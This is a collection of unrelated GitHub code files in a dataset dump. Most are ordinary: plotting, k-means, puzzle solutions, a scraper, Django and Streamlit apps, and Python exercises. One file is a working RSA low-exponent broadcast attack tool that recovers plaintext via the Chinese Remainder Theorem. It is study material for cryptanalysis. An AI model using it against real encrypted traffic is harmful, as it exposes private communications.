plt.figure(figsize = [8,6])\n \n if plot2D:\n plt.plot(dat[:,0], dat[:,1], ls = '', marker = 'o', markersize = 4)\n plt.plot(points[:,0], points[:,1], ls = '-', marker = 'o', markersize = 4)\n \n plt.xlabel(\"PC1\"); plt.ylabel(\"PC2\")\n plt.show()\n \n else:\n \n ax = plt.axes(projection='3d')\n p = ax.scatter3D(dat[:,0], dat[:,1], dat[:,2], c = range(int(len(dat))), alpha=0.2)\n ax.plot3D(points[:,0], points[:,1], points[:,2], 'red', marker='o')\n \n for i in range(n_disks):\n c = Circle((0,0), rad[i], facecolor='grey', alpha=alpha)\n ax.add_patch(c)\n pathpatch_2d_to_3d(c, points[i], normal = normals[i])\n \n ax.set_xlabel('PC1'); ax.set_ylabel('PC2'); ax.set_zlabel('PC3') \n fig.colorbar(p, ax=ax)\n plt.show()\n \n \n ","repo_name":"chang-group/BKiT","sub_path":"BKit/ConstructMilestones3D.py","file_name":"ConstructMilestones3D.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"16276125583","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/3/29 下午9:36\n# @Author : lizheng\n# @FileName: demo2.py.py\n# @Software: PyCharm\nimport numpy as np\n\nimport cv2\n\nfrom matplotlib import pyplot as plt\n\n# 随机生成两组数值\n\n# xiaomi组,长和宽都在[0,20]内\n\nxiaomi=np.random.randint(0,20,(30,2))\n#dami组,长和宽的大小都在[40,60]\n\ndami=np.random.randint(40,60,(30,2))\n\n# 组合数据\n\nMI=np.vstack((xiaomi,dami))\n\n# 转换为float32类型\n\nMI=np.float32(MI)\n\n# 调用kmeans模块\n\n# 设置参数criteria值\n\ncriteria=(cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER,10,1.0)\n\n# 调用kmeans函数\n\nret,label,center=cv2.kmeans(MI,2,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)\n\n'''\n\n#打印返回值\n\nprint(ret)\n\nprint(label)\n\nprint(center)\n\n'''\n\n# 根据kmeans的处理结果,将数据分类,分为XM和DM两大类\n\nXM=MI[label.ravel()==0]\n\nDM=MI[label.ravel()==1]\n\n# 绘制分类结果数据及中心点\n\nplt.scatter(XM[:,0],XM[:,1],c='g',marker='s')\n\nplt.scatter(DM[:,0],DM[:,1],c='r',marker='o')\n\nplt.scatter(center[0,0],center[0,1],s=200,c='b',marker='o')\n\nplt.scatter(center[1,0],center[1,1],s=200,c='b',marker='s')\n\nplt.xlabel('Height'),plt.ylabel('Width')\n\nplt.show()","repo_name":"LiZheng1997/OpenCV_Practice","sub_path":"Chapters/Chapter22/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18707358495","text":"#!/usr/bin/env python3\n\n\"\"\"\nTool to perform the low exponent attack against RSA.\n\nIf the public exponent e is sufficiently small and\none obtained e times the ciphertext of a fixed message\nalong with the differing moduli, the plaintext can be\nrecovered.\n\"\"\"\n\nimport argparse\nfrom functools import reduce\nfrom operator import mul\nimport sys\n\nimport gmpy2\n\n\ndef xgcd(b, n):\n \"\"\"\n Extended Euclidean Algorithm\n \"\"\"\n\n x0, x1, y0, y1 = 1, 0, 0, 1\n while n != 0:\n q, b, n = b // n, n, b % n\n x0, x1 = x1, x0 - q * x1\n y0, y1 = y1, y0 - q * y1\n return b, x0, y0\n\n\ndef crt(moduli, x_list):\n \"\"\"\n Chinese Remainder Theorem\n \"\"\"\n\n modulus = reduce(mul, moduli, 1)\n multipliers = []\n for m in moduli:\n M = modulus // m\n _, inverse, _ = xgcd(M, m)\n multipliers.append((inverse * M) % modulus)\n result = 0\n for multi, x in zip(multipliers, x_list):\n result = (result + multi * x) % modulus\n return result\n\n\ndef low_exponent_attack(moduli, ciphertexts):\n \"\"\"\n Low Exponent Attack against RSA\n \"\"\"\n\n c = crt(moduli, ciphertexts)\n root, _ = gmpy2.iroot(c, len(rsa_moduli))\n return int(root)\n\n\ndef parse_file(filename, input_base):\n \"\"\"\n Parse input file containing moduli or ciphertexts and return a list of them\n \"\"\"\n\n content = []\n with open(filename, encoding=\"utf-8\") as f:\n for line in f:\n if line.strip():\n content.append(int(line, input_base))\n if len(set(content)) != len(content):\n print(f\"Error: {filename} contains some duplicates, this won't work!\", file=sys.stderr)\n sys.exit(1)\n return content\n\n\nif __name__ == '__main__':\n argparser = argparse.ArgumentParser(description=\"Perform low exponent attack against RSA.\")\n argparser.add_argument(\"moduli\", help=\"file containing the used RSA moduli one per line\")\n argparser.add_argument(\"ciphertexts\", help=\"file containing the ciphertexts one per line\")\n argparser.add_argument(\"--hex\", dest=\"base\", action=\"store_const\", const=16, default=10, help=\"data in input files is hex encoded\")\n args = argparser.parse_args()\n\n rsa_moduli = parse_file(args.moduli, args.base)\n rsa_ciphertexts = parse_file(args.ciphertexts, args.base)\n\n plain_int = low_exponent_attack(rsa_moduli, rsa_ciphertexts)\n print(\"Plaintext (integer):\")\n print(plain_int)\n\n plain_hex = hex(plain_int)[2:]\n print(\"Plaintext (hex):\")\n print(plain_hex)\n\n plain_bytes = bytes.fromhex(plain_hex)\n plain_utf8 = plain_bytes.decode('utf-8')\n print(\"Plaintext (utf-8):\")\n print(plain_utf8)\n","repo_name":"exploide/securitools","sub_path":"crypto/rsa_low_exponent_attack.py","file_name":"rsa_low_exponent_attack.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"33641622485","text":"import re\r\n\r\ndef is_possible(x, y):\r\n for sx, sy, d in sensors:\r\n if manhattan_dist((sx, sy), (x, y)) <= d and (x, y) not in beacons:\r\n return False\r\n\r\n return True\r\n\r\ndef manhattan_dist(a: tuple, b: tuple) -> int:\r\n return (abs(a[0] - b[0]) + abs(a[1] - b[1]))\r\n\r\ndef part1(j: int):\r\n count = 0\r\n lower = min(x - d for x, _, d in sensors)\r\n upper = max(x +d for x, _, d in sensors)\r\n\r\n for i in range(lower, upper):\r\n if not is_possible(i, j) and (i, j) not in beacons:\r\n count += 1\r\n\r\n return count\r\n\r\nwith open('input.txt', 'r') as f:\r\n lines = [[int(y) for y in z] for z in [re.findall(r'\\w+\\=([\\-]?\\d+)', x) for x in f.readlines()]]\r\n\r\nsensors = set()\r\nsensors2 = set()\r\nbeacons = set()\r\nradius = {(a, b): manhattan_dist((a, b), (c, d)) for (a, b, c, d) in lines}\r\n\r\nfor line in lines:\r\n sx, sy = line[0], line[1]\r\n bx, by = line[2], line[3]\r\n\r\n d = manhattan_dist((sx, sy), (bx, by))\r\n\r\n sensors.add((sx, sy, d))\r\n sensors2.add((sx, sy))\r\n beacons.add((bx, by))\r\n\r\nprint(part1(2000000))\r\n\r\nacoeffs, bcoeffs = set(), set()\r\n\r\nfor (x, y), r in radius.items():\r\n acoeffs.add(y - x + r + 1)\r\n acoeffs.add(y - x - r - 1)\r\n bcoeffs.add(x + y + r + 1)\r\n bcoeffs.add(x + y - r - 1)\r\n\r\nubound = 4000000\r\n\r\nfor a in acoeffs:\r\n for b in bcoeffs:\r\n point = ((b - a) // 2, (a + b) // 2)\r\n if all(0 < coordinate < ubound for coordinate in point):\r\n if all(manhattan_dist(point, center) > radius[center] for center in radius.keys()):\r\n print(4000000 * point[0] + point[1])\r\n\r\n","repo_name":"tiitinha/adventofcode","sub_path":"AoC22/day15/python/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23025351787","text":"\nfrom selenium import webdriver\nimport base64\nfrom selenium.webdriver.common.by import By\nimport requests\nimport io\nfrom PIL import Image\nimport time\nimport os\n# wd = webdriver.Firefox()\n\nclass scrapping_image_from_google:\n\n\tdef get_images_url_from_google(wd, delay, max_images,search_query):\n\n\t\tdef scroll_down(wd):\n\t\t\tif max_images<400:\n\t\t\t\twd.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\t\t\t\ttime.sleep(delay)\n\t\t\telse:\n\t\t\t\tlast_height = wd.execute_script('return document.body.scrollHeight')\n\t\t\t\twhile True:\n\t\t\t\t\twd.execute_script('window.scrollTo(0, document.body.scrollHeight)')\n\t\t\t\t\ttime.sleep(delay)\t\n\t\t\t\t\tnew_height = wd.execute_script('return document.body.scrollHeight')\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\telement = wd.find_element(By.XPATH, \"//input[@value='Show more results']\")\n\n\n\t\t\t\t\t\telement.click()\n\t\t\t\t\t\ttime.sleep(delay)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\t\t\t\t\tif new_height == last_height:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tlast_height = new_height\n\n\t\turl = f\"https://www.google.com/search?q={search_query}&tbm=isch\"\n\t\twd.get(url)\n\n\t\timage_urls = set()\n\t\tskips = 0\n\t\tscroll_down(wd)\n\n\t\tthumbnails = wd.find_elements(By.CLASS_NAME, \"Q4LuWd\")\n\n\t\twhile len(image_urls) + skips < max_images:\n\t\t\t\n\t\t\tfor img in thumbnails[len(image_urls) + skips:max_images]:\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\timg.click()\n\t\t\t\t\ttime.sleep(delay)\n\t\t\t\texcept:\n\t\t\t\t\tcontinue\n\n\t\t\t\timages = wd.find_elements(By.CLASS_NAME, \"r48jcc\")\n\t\t\t\tfor image in images:\n\t\t\t\t\tif image.get_attribute('src') in image_urls:\n\t\t\t\t\t\tmax_images += 1\n\t\t\t\t\t\tskips += 1\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif image.get_attribute('src') and 'http' in image.get_attribute('src'):\n\t\t\t\t\t\timage_urls.add(image.get_attribute('src'))\n\t\t\t\t\t\tprint(f\"Found [{len(image_urls)}]\")\n\t\treturn image_urls\n\tdef download_image(download_path, urls, file_name):\n\t\tresult=[]\n\t\tmain_directory=f\"{download_path}/{file_name}\"\n\t\tos.makedirs(main_directory)\n\t\t\n\t\tfor i, url in enumerate(urls):\n\t\t\n\t\t\ttry:\n\t\t\t\timage_content = requests.get(url,allow_redirects=True,timeout=10).content\n\t\t\t\timage_file = io.BytesIO( image_content)\n\t\t\t\timage = Image.open(image_file)\n\t\t\t\tfile_path = f\"{main_directory}/{i+1}.jpeg\"\n\t\t\t\timage = image.convert('RGB')\n\n\t\t\t\twith open(file_path, \"wb\") as f:\n\t\t\t\t\timage.save(f, \"JPEG\")\n\n\t\t\t\tprint(f\"Success download[{i+1}] \")\n\t\t\t\tresult.append(file_path)\n\n\t\t\texcept Exception as e:\n\t\t\t\tprint('FAILED -', e)\n\t\treturn(result)\n\n\n\nif __name__=='__main__':\n\n\tobj=scrapping_image_from_google\n\turls = obj.get_images_url_from_google(wd, 3, 3,search_query=\"mountain\")\n\tobj.download_image(\"imgs/\", urls, \"mountain\")\n\twd.quit()","repo_name":"hosseinhj1380/google-image-scrapping","sub_path":"second-phase/scrapping.py","file_name":"scrapping.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"953737694","text":"def plusOne(digits):\n idx = len(digits) - 1\n digits[idx] += 1\n if digits[idx] != 10:\n return(digits)\n else:\n while(idx > 0 and digits[idx] == 10 ):\n digits[idx] = 0\n digits[idx-1] += 1\n idx -= 1\n if digits[0] == 10:\n digits[0] = 0\n digits.insert(0,1)\n return(digits)\n\nprint(plusOne([2,9,9,1,9]))\n\nclass Solution:\n def plusOne(self, A):\n num = 0\n exp = len(A) - 1\n for i in range(len(A)):\n num = num + (A[i] * (10 ** exp))\n exp -= 1\n num += 1\n num_list = self.conv_num_to_list(num)\n return(num_list)\n\n def conv_num_to_list(self,num):\n result = []\n while(num > 0):\n digit = num % 10\n result.insert(0,digit)\n num = num // 10\n return(result)\n\ns = Solution()\nres = s.plusOne([0,9])\nprint(res)","repo_name":"aparna-narasimhan/python_examples","sub_path":"Arrays/plus_one.py","file_name":"plus_one.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19026701846","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 14 12:00:34 2020\n\n@author: Gary\n\nThis code is used to direct the process of making a static web site of\na disclosure catelog.\n\"\"\"\nimport core.Construct_set as const_set\n#import website_gen.web_gen as web_gen\nimport website_gen.API_web_gen as API_gen\n\ndata_date = '2021-03-05'\n\ntab_const = const_set.Construct_set(fromScratch=False).get_full_set()\n\nag = API_gen.API_web_gen(tab_man=tab_const,data_date=data_date)\nag.make_cluster_set()\n\nag.make_api_set()\n#ag.make_index_page()\n#apidf = ag.getAPIdf()","repo_name":"gwallison/open-FF","sub_path":"generate_disclosure_site.py","file_name":"generate_disclosure_site.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2559223939","text":"father = float(input(\"请输入父亲身高(米)\\n>>\"))\nmother = float(input(\"请输入母亲身高(米)\\n>>\"))\n\nson = ((father+mother)*1.08)/2\ndaughter = (father*0.923+mother)/2\n\ngender = str(input(\"请输入孩子的性别(男/女)\\n>>\"))\nif gender == \"男\":\n print(\"预测您儿子成年后的身高为\"+str(son)+\"米\")\nif gender == \"女\":\n print(\"预测您女儿成年后的身高为\"+str(daughter)+\"米\")\n\n# 程序作者 快速的飓风.\n# 于 2019.10.07\n# 严禁抄袭\n","repo_name":"Hurrieam/homework-csapp","sub_path":"Python作业/02/Work_2.2.py","file_name":"Work_2.2.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35323041863","text":"from keras.models import load_model\nimport pickle\nimport streamlit as st\nfrom streamlit_option_menu import option_menu\n\n## Load the models\n\ndiabetes_model=pickle.load(open('/home/aditya/Desktop/AR/Multiple Disease Prediction/Diseases/Models/diabetesmodel.sav','rb'))\nheart_model=pickle.load(open('/home/aditya/Desktop/AR/Multiple Disease Prediction/Diseases/Models/heart_disease_model.sav','rb'))\nparkinson_model=pickle.load(open('/home/aditya/Desktop/AR/Multiple Disease Prediction/Diseases/Models/parkinsons_model.sav','rb'))\ncancer_model=load_model('/home/aditya/Desktop/AR/Multiple Disease Prediction/Diseases/Models/cancer.h5')\n\n#sidebar for navigation\nwith st.sidebar:\n selected=option_menu('Disease Prediction System',\n ['Predict Diabetes',\n 'Predict Heart Disease',\n 'Predict Parkinsons Disease',\n 'Predict Breast Cancer'],\n icons=['activity','heart','file-person-fill','journal-medical'],\n default_index=0)\n\n# Diabetes Prediction Page\nif (selected == 'Predict Diabetes'):\n # page title\n st.title('Diabetes Prediction using ML')\n \n # getting the input data from the user\n col1, col2, col3 = st.columns(3)\n with col1:\n Pregnancies = st.text_input('Number of Pregnancies') \n with col2:\n Glucose = st.text_input('Glucose Level')\n with col3:\n BloodPressure = st.text_input('Blood Pressure value')\n with col1:\n SkinThickness = st.text_input('Skin Thickness value')\n with col2:\n Insulin = st.text_input('Insulin Level')\n with col3:\n BMI = st.text_input('BMI value')\n with col1:\n DiabetesPedigreeFunction = st.text_input('Diabetes Pedigree Function value')\n with col2:\n Age = st.text_input('Age of the Person')\n \n # code for Prediction\n diab_diagnosis = ''\n # creating a button for Prediction\n if st.button('Diabetes Test Result'):\n diab_prediction = diabetes_model.predict([[Pregnancies, Glucose, BloodPressure, SkinThickness, Insulin, BMI, DiabetesPedigreeFunction, Age]])\n \n if (diab_prediction[0] == 1):\n diab_diagnosis = 'The person is diabetic'\n else:\n diab_diagnosis = 'The person is not diabetic' \n st.success(diab_diagnosis)\n\n\n# Heart Disease Prediction Page\nif (selected == 'Predict Heart Disease'):\n # page title\n st.title('Heart Disease Prediction using ML')\n col1, col2, col3 = st.columns(3)\n with col1:\n age = st.text_input('Age') \n with col2:\n sex = st.text_input('Sex') \n with col3:\n cp = st.text_input('Chest Pain types') \n with col1:\n trestbps = st.text_input('Resting Blood Pressure') \n with col2:\n chol = st.text_input('Serum Cholestoral in mg/dl')\n with col3:\n fbs = st.text_input('Fasting Blood Sugar > 120 mg/dl')\n with col1:\n restecg = st.text_input('Resting Electrocardiographic results')\n with col2:\n thalach = st.text_input('Maximum Heart Rate achieved')\n with col3:\n exang = st.text_input('Exercise Induced Angina')\n with col1:\n oldpeak = st.text_input('ST depression induced by exercise')\n with col2:\n slope = st.text_input('Slope of the peak exercise ST segment') \n with col3:\n ca = st.text_input('Major vessels colored by flourosopy') \n with col1:\n thal = st.text_input('thal: 0 = normal; 1 = fixed defect; 2 = reversable defect')\n \n # code for Prediction\n heart_diagnosis = ''\n # creating a button for Prediction\n if st.button('Heart Disease Test Result'):\n heart_prediction = heart_model.predict([[age, sex, cp, trestbps, chol, fbs, restecg,thalach,exang,oldpeak,slope,ca,thal]]) \n if (heart_prediction[0] == 1):\n heart_diagnosis = 'The person is having heart disease'\n else:\n heart_diagnosis = 'The person does not have any heart disease' \n st.success(heart_diagnosis)\n\n\n# Parkinson's Prediction Page\nif (selected == \"Predict Parkinsons Disease\"):\n # page title\n st.title(\"Parkinson's Disease Prediction using ML\")\n col1, col2, col3, col4, col5 = st.columns(5) \n with col1:\n fo = st.text_input('MDVP:Fo(Hz)') \n with col2:\n fhi = st.text_input('MDVP:Fhi(Hz)') \n with col3:\n flo = st.text_input('MDVP:Flo(Hz)') \n with col4:\n Jitter_percent = st.text_input('MDVP:Jitter(%)') \n with col5:\n Jitter_Abs = st.text_input('MDVP:Jitter(Abs)') \n with col1:\n RAP = st.text_input('MDVP:RAP') \n with col2:\n PPQ = st.text_input('MDVP:PPQ') \n with col3:\n DDP = st.text_input('Jitter:DDP') \n with col4:\n Shimmer = st.text_input('MDVP:Shimmer') \n with col5:\n Shimmer_dB = st.text_input('MDVP:Shimmer(dB)') \n with col1:\n APQ3 = st.text_input('Shimmer:APQ3')\n with col2:\n APQ5 = st.text_input('Shimmer:APQ5') \n with col3:\n APQ = st.text_input('MDVP:APQ') \n with col4:\n DDA = st.text_input('Shimmer:DDA') \n with col5:\n NHR = st.text_input('NHR')\n with col1:\n HNR = st.text_input('HNR') \n with col2:\n RPDE = st.text_input('RPDE') \n with col3:\n DFA = st.text_input('DFA') \n with col4:\n spread1 = st.text_input('spread1')\n with col5:\n spread2 = st.text_input('spread2') \n with col1:\n D2 = st.text_input('D2') \n with col2:\n PPE = st.text_input('PPE')\n \n # code for Prediction\n parkinsons_diagnosis = ''\n # creating a button for Prediction \n if st.button(\"Parkinson's Test Result\"):\n parkinsons_prediction = parkinson_model.predict([[fo, fhi, flo, Jitter_percent, Jitter_Abs, RAP, PPQ,DDP,Shimmer,Shimmer_dB,APQ3,APQ5,APQ,DDA,NHR,HNR,RPDE,DFA,spread1,spread2,D2,PPE]]) \n \n if (parkinsons_prediction[0] == 1):\n parkinsons_diagnosis = \"The person has Parkinson's disease\"\n else:\n parkinsons_diagnosis = \"The person does not have Parkinson's disease\" \n st.success(parkinsons_diagnosis)\n\n\n# Breast Cancer Prediction Page\nif (selected == \"Predict Breast Cancer\"):\n # page title\n st.title(\"Breast Cancer Prediction using ML\")\n col1, col2, col3, col4, col5 ,col6= st.columns(6) \n with col1:\n meanradius= st.text_input('Mean Radius') \n with col2:\n meantexture = st.text_input('Mean Texture') \n with col3:\n meanperimeter = st.text_input('Mean Perimeter') \n with col4:\n meanarea = st.text_input('Mean Area') \n with col5:\n meansmoothness = st.text_input('mean smoothness') \n with col6:\n meancompactness = st.text_input('Mean Compactness') \n with col1:\n meanconcavity = st.text_input('Mean Concavity') \n with col2:\n meanconcavepoints = st.text_input('Mean Concave Points') \n with col3:\n meansymmetry = st.text_input('Mean Symmetry') \n with col4:\n meanfractaldimension= st.text_input('Mean Fractal Dimension') \n with col5:\n radiuserror = st.text_input('Radius Error') \n with col6:\n textureerror = st.text_input('Texture Error') \n with col1:\n perimetererror = st.text_input('Perimeter Error') \n with col2:\n areaerror = st.text_input('Area Error') \n with col3:\n smoothnesserror= st.text_input('Smoothness Error') \n with col4:\n compactnesserror= st.text_input('Compactness Error') \n with col5:\n concavityerror = st.text_input('Concavity Error') \n with col6:\n concavepointserror = st.text_input('Concave Points Error') \n with col1:\n symmetryerror = st.text_input('Symmetry Error') \n with col2:\n fractionaldimensionerror = st.text_input('Fractal Dimension Error') \n with col3:\n worstradius = st.text_input('Worst Radius') \n with col4:\n worsttexture = st.text_input('Worst Texture') \n with col5:\n worstperimeter = st.text_input('Worst Perimeter') \n with col6:\n worstarea = st.text_input('Worst Area') \n with col1:\n worstsmoothness = st.text_input('Worst Smoothness') \n with col2:\n worstcompactness = st.text_input('Worst Compactness') \n with col3:\n worstconcavity = st.text_input('Worst Concavity') \n with col4:\n worstconcavepoints = st.text_input('Worst Concave Points') \n with col5:\n worstsymmetry = st.text_input('Worst Symmetry') \n with col6:\n worstfractaldimension = st.text_input('Worst Fractal Dimension') \n # code for Prediction\n breast_diagnosis = ''\n # creating a button for Prediction \n if st.button(\"Breast Cancer Test Result\"):\n cancer_prediction = cancer_model.predict([['meanradius','meantexture','meanperimeter','meanarea'\n'meansmoothness',\n'meancompactness',\n'meanconcavity',\n'meanconcavepoints',\n'meansymmetry',\n'meanfractaldimension',\n'radiuserror',\n'textureerror',\n'perimetererror',\n'areaerror',\n'smoothnesserror',\n'compactnesserror',\n'concavityerror',\n'concavepointserror',\n'symmetryerror',\n'fractaldimension error',\n'worstradius',\n'worsttexture',\n'worstperimeter',\n'worstarea',\n'worstsmoothness',\n'worstcompactness',\n'worstconcavity',\n'worstconcavepoints',\n'worstsymmetry',\n'worstfractaldimension',\n]]) \n \n if (cancer_prediction[0] == 1):\n breast_diagnosis = \"The Tumer is Malignant \"\n else:\n breast_diagnosis = \"The Tumer is Benign\" \n st.success(breast_diagnosis)","repo_name":"adirayer/Predict-Diseases","sub_path":"Diseases/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71057669227","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\n\nexec(open(\"kin/version.py\").read())\n\nwith open('requirements.txt') as f:\n requires = [line.strip() for line in f if line.strip()]\nwith open('requirements-dev.txt') as f:\n tests_requires = [line.strip() for line in f if line.strip()]\n\nsetup(\n name='kin-sdk-python',\n version=__version__,\n description='KIN SDK for Python',\n author='Kin Foundation',\n maintainer='David Bolshoy',\n maintainer_email='david.bolshoy@kik.com',\n url='https://github.com/kinfoundation/kin-sdk-python',\n license='GPLv2',\n packages=[\"kin\"],\n long_description=open(\"README.md\").read(),\n keywords = [\"kin\", \"cryptocurrency\", \"blockchain\"],\n classifiers=[\n 'License :: OSI Approved :: MIT License',\n 'Intended Audience :: Developers',\n 'Development Status :: 4 - Beta',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n ],\n install_requires=requires,\n tests_require=tests_requires,\n)\n","repo_name":"kinecosystem/kin-sdk-python-ethereum","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"42632872007","text":"from django import forms\n\nfrom .models import Product\n\n\nclass ProductForm(forms.ModelForm):\n title = forms.CharField(label='Title custom', widget=forms.TextInput(\n attrs={\n \"placeholder\": \"HI Janna\",\n }\n ))\n description = forms.CharField(required=True, widget=forms.Textarea(\n attrs={\n \"placeholder\": \"HI Janna\",\n \"class\": \"new-class-name two\",\n \"id\": \"desc\",\n \"rows\": 12,\n \"cols\": 120,\n\n }\n ))\n price = forms.DecimalField(initial=155.5)\n\n class Meta:\n model = Product\n fields = [\n 'title',\n 'description',\n 'price'\n ]\n\n def clean_title(self, *args, **kwargs):\n title = self.cleaned_data.get(\"title\")\n if not \"mos\" in title:\n raise forms.ValidationError(\"this is not contains mos\")\n if len(title) < 4:\n raise forms.ValidationError(\"short\")\n return title\n\n\nclass RawProductForm(forms.Form):\n title = forms.CharField(label='Title custom', widget=forms.TextInput(\n attrs={\n \"placeholder\": \"HI Janna\",\n }\n ))\n description = forms.CharField(required=False, widget=forms.Textarea(\n attrs={\n \"placeholder\": \"HI Janna\",\n \"class\": \"new-class-name two\",\n \"id\": \"desc\",\n \"rows\": 12,\n \"cols\": 120,\n\n }\n ))\n price = forms.DecimalField(initial=155.5)\n","repo_name":"mostafaadawy/first_django","sub_path":"products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23908400711","text":"# 7-1. Rental Car: Write a program that asks the user what kind of rental car\n# they would like. Print a message about that car, such as “Let me see if I can\n# find you a Subaru.”\n# print('\\n---\\n7-1\\n---\\n')\n# car_request = input('What kind of rental car would you like? ')\n# print(f'Let me see if I can find you a {car_request}.')\n\n# 7-2. Restaurant Seating: Write a program that asks the user how many people\n# are in their dinner group. If the answer is more than eight, print a message\n# saying they’ll have to wait for a table. Otherwise, report that their table\n# is ready.\nprint('\\n---\\n7-2\\n---\\n')\ngroup_size = int(input('How many people are in your dinner group? '))\n\nif group_size > 8:\n print('Sorry, you will have to wait for a table.')\nelse: \n print('Your table is ready.')\n\n# 7-3. Multiples of Ten: Ask the user for a number, and then report whether the\n# number is a multiple of 10 or not.\nprint('\\n---\\n7-3\\n---\\n')\nis_multiple_of_10 = int(input('Please enter a number: '))\nif is_multiple_of_10 % 10 == 0:\n print('This is a multiple of 10.')\nelse: \n print('This is not a multiple of 10')\n\n# 7-4. Pizza Toppings: Write a loop that prompts the user to enter a series of\n# pizza toppings until they enter a 'quit' value. As they enter each topping\n# print a message saying you’ll add that topping to their pizza.\nprint('\\n---\\n7-3\\n---\\n')\nkeep_going = True\ntoppings = []\nwhile keep_going is True:\n topping = input(\"What topping would you like to add? \")\n if topping == 'quit':\n keep_going = False\n else:\n toppings.append(topping)\n print(f'We will add {topping} to your pizza.')\nprint(toppings)\n\n# 7-5. Movie Tickets: A movie theater charges different ticket prices depending\n# on a person’s age. If a person is under the age of 3, the ticket is free; if\n# they are between 3 and 12, the ticket is $10; and if they are over age 12,\n# the ticket is $15. Write a loop in which you ask users their age, and then\n# tell them the cost of their movie ticket.\nprint('\\n---\\n7-5\\n---\\n')\nkeep_going = True\n\nwhile keep_going is True:\n age = input(\"What is your age?\")\n if age == 'quit':\n keep_going = False\n elif int(age) < 3:\n print('Their ticket is free')\n elif int(age) <= 12:\n print('The ticket is $10')\n elif int(age) > 12:\n print('The ticket is $15')\n\n# 7-6. Three Exits: Write different versions of either Exercise 7-4 or Exercise\n# 7-5 that do each of the following at least once:\nprint('\\n---\\n7-3\\n---\\n')\n# • Use a conditional test in the while statement to stop the loop.\nkeep_going = True\n\nwhile keep_going is True:\n age = input(\"What is your age?\")\n if age == 'quit':\n keep_going = False\n elif int(age) < 3:\n print('Their ticket is free')\n elif int(age) <= 12:\n print('The ticket is $10')\n elif int(age) > 12:\n print('The ticket is $15')\n# • Use an active variable to control how long the loop runs.\ni=0\nwhile i < 1:\n age = input(\"What is your age?\")\n if int(age) < 3:\n print('Their ticket is free')\n elif int(age) <= 12:\n print('The ticket is $10')\n elif int(age) > 12:\n print('The ticket is $15')\n i+= 1\n# • Use a break statement to exit the loop when the user enters a 'quit' value.\nkeep_going = True\n\nwhile keep_going is True:\n age = input(\"What is your age?\")\n if age == 'quit':\n break\n if int(age) < 3:\n print('Their ticket is free')\n elif int(age) <= 12:\n print('The ticket is $10')\n elif int(age) > 12:\n print('The ticket is $15')\n\n# 7-7. Infinity: Write a loop that never ends, and run it. (To end the loop\n# press ctrl-C or close the window displaying the output.)\nprint('\\n---\\n7-7\\n---\\n')\n\n# 7-8. Deli: Make a list called sandwich_orders and fill it with the names of\n# vari- ous sandwiches. Then make an empty list called finished_sandwiches.\n# Loop through the list of sandwich orders and print a message for each order\n# such as I made your tuna sandwich. As each sandwich is made, move it to the\n# list of finished sandwiches. After all the sandwiches have been made, print a\n# message listing each sandwich that was made.\nprint('\\n---\\n7-8\\n---\\n')\nsandwich_orders = ['rueben', 'blt', 'hamburger', 'avacado']\nfinished_sandwiches = []\n\nwhile sandwich_orders:\n sandwich = sandwich_orders.pop()\n print('I have made your {}.'.format(sandwich))\n finished_sandwiches.append(sandwich)\n\nprint(\"Today we made an {}, a {}, {}, and a {} sandiwch.\"\\\n .format(finished_sandwiches[0],\n finished_sandwiches[1],\n finished_sandwiches[2],\n finished_sandwiches[3]))\n \n\n# 7-9. No Pastrami: Using the list sandwich_orders from Exercise 7-8, make sure\n# the sandwich 'pastrami' appears in the list at least three times. Add code\n# near the beginning of your program to print a message saying the deli has run\n# out of pastrami, and then use a while loop to remove all occurrences of\n# 'pastrami' from sandwich_orders. Make sure no pastrami sandwiches end up in\n# finished_sandwiches.\nprint('\\n---\\n7-9\\n---\\n')\nsandwich_orders = ['rueben', 'blt', 'hamburger','pastrami', 'pastrami',\n 'avacado', 'pastrami']\nfinished_sandwiches = []\n\nprint('The deli has run out of pastrami')\n\nwhile 'pastrami' in sandwich_orders:\n sandwich_orders.remove('pastrami')\n\nwhile sandwich_orders:\n sandwich = sandwich_orders.pop()\n print('I have made your {}.'.format(sandwich))\n finished_sandwiches.append(sandwich)\n\nprint('Today we made the following sandwiches: ')\nfor sandwich in 